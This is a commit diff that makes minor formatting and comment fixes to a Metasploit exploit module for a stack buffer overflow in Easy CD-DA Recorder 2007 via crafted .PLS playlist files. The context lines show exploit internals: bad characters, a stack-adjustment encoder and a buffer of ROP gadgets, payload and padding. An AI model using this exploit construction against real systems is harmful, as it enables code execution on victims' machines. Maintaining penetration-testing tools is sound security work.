Minor code formatting

bug/bundler_fix
sgabe 2014-02-11 23:53:04 +01:00
parent 7fc3511ba9
commit 3f09456ce8
1 changed files with 4 additions and 4 deletions

View File

@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
This module exploits a stack-based buffer overflow vulnerability in
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .PLS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This modules has been tested successfully on
the application to crash. This module has been tested successfully on
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2454,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
},
'Targets' =>
[
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << rop_nops(8)
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # make it crash
sploit << rand_text_alpha_upper(10000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")